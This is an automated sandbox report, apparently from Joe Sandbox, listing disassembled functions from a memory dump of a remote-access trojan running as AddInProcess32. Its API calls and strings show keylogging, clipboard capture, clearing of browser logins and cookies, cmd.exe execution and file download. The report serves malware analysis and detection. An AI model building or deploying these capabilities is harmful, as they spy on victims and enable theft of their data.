                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                        • String ID: !D@
                                        • API String ID: 3446828153-604454484
                                        • Opcode ID: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                        • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                        • Opcode Fuzzy Hash: b7364eaafb7a437eec89ed9fb4143899ef50b32a2d873a0c8232afd7958e43d5
                                        • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                        Function 004160EE Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID: /C $cmd.exe$open
                                        • API String ID: 587946157-3896048727
                                        • Opcode ID: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                        • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                        • Opcode Fuzzy Hash: 64774f0173dd2414335a6a01ca4130183aa4f4d30cf83fc1238f67c292a9c67a
                                        • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                        Function 0040B8AC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • TerminateThread.KERNEL32(0040A27D,00000000,004752F0,pth_unenc,0040D0B8,004752D8,004752F0,?,pth_unenc), ref: 0040B8BB
                                        • UnhookWindowsHookEx.USER32(004750F0), ref: 0040B8C7
                                        • TerminateThread.KERNEL32(Function_0000A267,00000000,?,pth_unenc), ref: 0040B8D5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: TerminateThread$HookUnhookWindows
                                        • String ID: pth_unenc
                                        • API String ID: 3123878439-4028850238
                                        • Opcode ID: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                        • Instruction ID: 1c21f009177841ea8acfe7f5b61a435624369701cc7e40c150536a334dec3301
                                        • Opcode Fuzzy Hash: 507b53b63eb7c6f10faa5869e7b72cd95082fe0a88c6c54c261be3869f185826
                                        • Instruction Fuzzy Hash: 4AE01272205356EFD7241FA09C988267BEEDA0478A324487EF2C3626B1CA794C10CB5D
                                        Function 004014AF Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                        • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressLibraryLoadProc
                                        • String ID: GetLastInputInfo$User32.dll
                                        • API String ID: 2574300362-1519888992
                                        • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                        • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                        • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                        • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                        Function 0044A004 Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __alldvrm$_strrchr
                                        • String ID:
                                        • API String ID: 1036877536-0
                                        • Opcode ID: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                        • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                        • Opcode Fuzzy Hash: 4f8832beee02cc7ac8349e43431f1a5ed1ce449240751d3aeed044ff3a2741d2
                                        • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                        Function 00442801 Relevance: 6.1, APIs: 4, Instructions: 133COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                        • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                        • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                        • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                        Function 00404CC3 Relevance: 6.1, APIs: 4, Instructions: 121synchronizationthreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                        • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404DD2
                                        • CloseHandle.KERNEL32(?,?,00000000), ref: 00404DDB
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                        • String ID:
                                        • API String ID: 3360349984-0
                                        • Opcode ID: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                        • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                        • Opcode Fuzzy Hash: 896836ce6e67791e20d0eed4e42f92f466038b3ea1b67db69a0d6ef4832fab86
                                        • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                        Function 0040C00C Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 103sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                        • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Sleep
                                        • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                        • API String ID: 3472027048-1236744412
                                        • Opcode ID: f1247b9b7b7232e3c2b0df6ea8e4249d3c093c33305ff24fa1c69204234e4c98
                                        • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                        • Opcode Fuzzy Hash: f1247b9b7b7232e3c2b0df6ea8e4249d3c093c33305ff24fa1c69204234e4c98
                                        • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                        Function 0040A529 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 71sleepCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                          • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                          • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                        • Sleep.KERNEL32(000001F4), ref: 0040A573
                                        • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Window$SleepText$ForegroundLength
                                        • String ID: [ $ ]
                                        • API String ID: 3309952895-93608704
                                        • Opcode ID: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                        • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                        • Opcode Fuzzy Hash: 31279ddc9ac779b407beafc78fb4a7c612abc736342ec11431a77cc1334fcb89
                                        • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                        Function 00443A33 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                        • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                        • Opcode Fuzzy Hash: e504ac4fddb0f8a25c6be19684a152be264dadb57d82260706401bb5bc5fb7a8
                                        • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                        Function 00443AB2 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                        Download Yara Rule
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                        • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                        • Opcode Fuzzy Hash: 253450334f16ac4bada5e464aed069c53fdbe8794578123440a1a1ba72333804
                                        • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                        Function 00448566 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue), ref: 00448598
                                        • GetLastError.KERNEL32(?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000,00000364,?,004482E7), ref: 004485A4
                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0044850D,00000000,00000000,00000000,00000000,?,00448839,00000006,FlsSetValue,0045F160,0045F168,00000000), ref: 004485B2
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LibraryLoad$ErrorLast
                                        • String ID:
                                        • API String ID: 3177248105-0
                                        • Opcode ID: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                        • Instruction ID: d5df962f837ff7629ef00c7a8b4dcab40ba3e58d8e4ddb8b40c265455ff02ab4
                                        • Opcode Fuzzy Hash: 03982c6842d6040e15a2f529479e2a2fef9fe475335e7dbaf6b0fa49dfb65394
                                        • Instruction Fuzzy Hash: AA012832602322FBD7214B289C4495B7798AB50B61B20053AFD05D3241DF34CD01CAE8
                                        Function 0041C485 Relevance: 6.0, APIs: 4, Instructions: 50fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,0040A843), ref: 0041C49E
                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0041C4B2
                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041C4D7
                                        • CloseHandle.KERNEL32(00000000), ref: 0041C4E5
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$CloseCreateHandleReadSize
                                        • String ID:
                                        • API String ID: 3919263394-0
                                        • Opcode ID: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                        • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                        • Opcode Fuzzy Hash: 3271d486463dfc93c477f1e2c7ad2cd28a4a76e92964f49fc02a4406d9477efd
                                        • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                        Function 0041C1DD Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                        • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                        • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                        • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleOpenProcess
                                        • String ID:
                                        • API String ID: 39102293-0
                                        • Opcode ID: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                        • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                        • Opcode Fuzzy Hash: 449f4402ebb840a84195bd3231048093a1951801f3bdb5f0a33f363ac88d28a1
                                        • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                        Function 00439863 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                          • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                        • _UnwindNestedFrames.LIBCMT ref: 00439891
                                        • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                        • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                        • String ID:
                                        • API String ID: 2633735394-0
                                        • Opcode ID: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                        • Instruction ID: dcee73c62e3621a690853eebe59cad03ae51e1002f288686f44977c5109bb855
                                        • Opcode Fuzzy Hash: f1135f3da04ba3a0995d0d42191a6de0eafd24a9b56dad318990318c05e81e44
                                        • Instruction Fuzzy Hash: 18011732000109BBCF12AF55CC01EDA3BBAEF9D754F04511AFD5861221C3BAE861DBA5
                                        Function 004193E3 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                        • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                        • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                        • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: MetricsSystem
                                        • String ID:
                                        • API String ID: 4116985748-0
                                        • Opcode ID: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                        • Instruction ID: 9a44d86f369c7068fc2c949f9b02ed5542bf43da40f6b7222f807aea32733f55
                                        • Opcode Fuzzy Hash: 8421f7446e2b2501a8c7f7ac55c2b56c52e48a318564101d3507d6038f1717f6
                                        • Instruction Fuzzy Hash: DFF0A471B043155BD744EA759C51A6F6BD5EBD4264F10043FF20887281EE78DC468785
                                        Function 00438F31 Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                        • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                        • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                          • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                        • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                        • String ID:
                                        • API String ID: 1761009282-0
                                        • Opcode ID: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                        • Instruction ID: 04dbcd9d80b8837b95b31ffc0e846904d80335f120ca5f78e3accc67d081205e
                                        • Opcode Fuzzy Hash: 37419d0d218480942dadea5656795116f0d18a982b1fc86bcd770d00ce79fbb1
                                        • Instruction Fuzzy Hash: 59C04C15080781541C50B6B2210B2AE83461E7E38DFD074DFFCE0571038E4E043B653F
                                        Function 0040B748 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                        • __Init_thread_footer.LIBCMT ref: 0040B797
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Init_thread_footer__onexit
                                        • String ID: [End of clipboard]$[Text copied to clipboard]
                                        • API String ID: 1881088180-3686566968
                                        • Opcode ID: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                                        • Instruction ID: c7bebb0a0a15900a9cc4ffb6e17528162536323bfdf0e6139bd55c50ddf57f74
                                        • Opcode Fuzzy Hash: fb1c81892c2e036c5d6c31f086f493dd212476ae9b22afc1b3a562318c09d8ed
                                        • Instruction Fuzzy Hash: C0219F32A101054ACB14FB66D8829EDB379AF90318F10453FE505731E2EF386D4A8A9C
                                        Function 00451B37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ACP$OCP
                                        • API String ID: 0-711371036
                                        • Opcode ID: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                        • Instruction ID: fc24b39bc158c677debbea649066bee6e1bba6d32f28379ebc1c8ba741b2d3ba
                                        • Opcode Fuzzy Hash: 9e0df5bdb224d2be14a0cd5949da06f0ee57b11af7c7271d7bdd2cdd18eeb32c
                                        • Instruction Fuzzy Hash: BA217D22A4010063DB34CF54C940B9B326ADF50B27F568166ED09C7322F73AED44C39C
                                        Function 00404FF4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                        Strings
                                        • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: KeepAlive | Enabled | Timeout:
                                        • API String ID: 481472006-1507639952
                                        • Opcode ID: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                        • Instruction ID: 59903f388a44bacb81d563bcbf5ab321eb0051b597eccb46fab67989b44e7fd4
                                        • Opcode Fuzzy Hash: 889eda472554f13da5ed19224a724834adbe5322b7fc00b68ad75e81c6f62207
                                        • Instruction Fuzzy Hash: 1D21F2719046405BD710B7259C0676F7B64E751308F40087EE8491B2A6DA7D5A88CBEF
                                        Function 0041663B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62sleepfilenetworkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • Sleep.KERNEL32 ref: 00416640
                                        • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: DownloadFileSleep
                                        • String ID: !D@
                                        • API String ID: 1931167962-604454484
                                        • Opcode ID: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                        • Instruction ID: f21b004d79e7af0ef9ad63e4b6518ad07bb10e0138b316cec4f8e9f86784bb19
                                        • Opcode Fuzzy Hash: 07a7ba679a22719b007f27f942da87136b12813d5d7402b4186b0f1ae2008f5d
                                        • Instruction Fuzzy Hash: C6115171A083029AC714FF72D8969BE77A8AF54348F400C3FF546621E2EE3C9949C65A
                                        Function 0041B4EF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 59timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime
                                        • String ID: | $%02i:%02i:%02i:%03i
                                        • API String ID: 481472006-2430845779
                                        • Opcode ID: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                        • Instruction ID: b0c371a91d376d28eb23a1cf2c2b6b2589463c7c7bf84255da33bc44f247512a
                                        • Opcode Fuzzy Hash: 0b58fb712609a629be2860926311a3a1d9782cd388fbf364b696734300abae58
                                        • Instruction Fuzzy Hash: 361181714082055AC304EB62D8419BFB3E9AB44348F50093FF895A21E1EF3CDA49C65A
                                        Function 0041AD17 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ExistsFilePath
                                        • String ID: alarm.wav$hYG
                                        • API String ID: 1174141254-2782910960
                                        • Opcode ID: 7ff3f59d16e843211484a17e640aea2c904abe2f50e58eb24b0ebd234ec542ff
                                        • Instruction ID: 1ebdaa4a32a078914063a8122a991a3a49773bb3edac1861de613ef54c78e1f6
                                        • Opcode Fuzzy Hash: 7ff3f59d16e843211484a17e640aea2c904abe2f50e58eb24b0ebd234ec542ff
                                        • Instruction Fuzzy Hash: 7A01F5B064460156C604F37698167EE37464B80319F00447FF68A266E2EFBC9D99C68F
                                        Function 0040B051 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040B172
                                          • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                        • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                        • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.3410831056.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_400000_AddInProcess32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                        • String ID: Online Keylogger Stopped
                                        • API String ID: 1623830855-1496645233
                                        • Opcode ID: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                        • Instruction ID: 2e372e3e3892c4e8816e9c8053feed756abc81e7e35a03d4dadb391bbfa0e77d
                                        • Opcode Fuzzy Hash: e1143dfe4ebbdf49b26d73ef465cebd6e20b11e5a8ab35f70cc7b7b67a3e30d6
                                        • Instruction Fuzzy Hash: 0101F5306002049BD7217B35C80B3BF7BA59B41305F40007FE642226D2EBB91845D7DE
                                        Function 004017EC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                        Download Yara Rule
                                        APIs
                                        • waveInPrepareHeader.WINMM(?,00000020,?,?,00476B50,00474EE0,?,00000000,00401A15), ref: 00401849
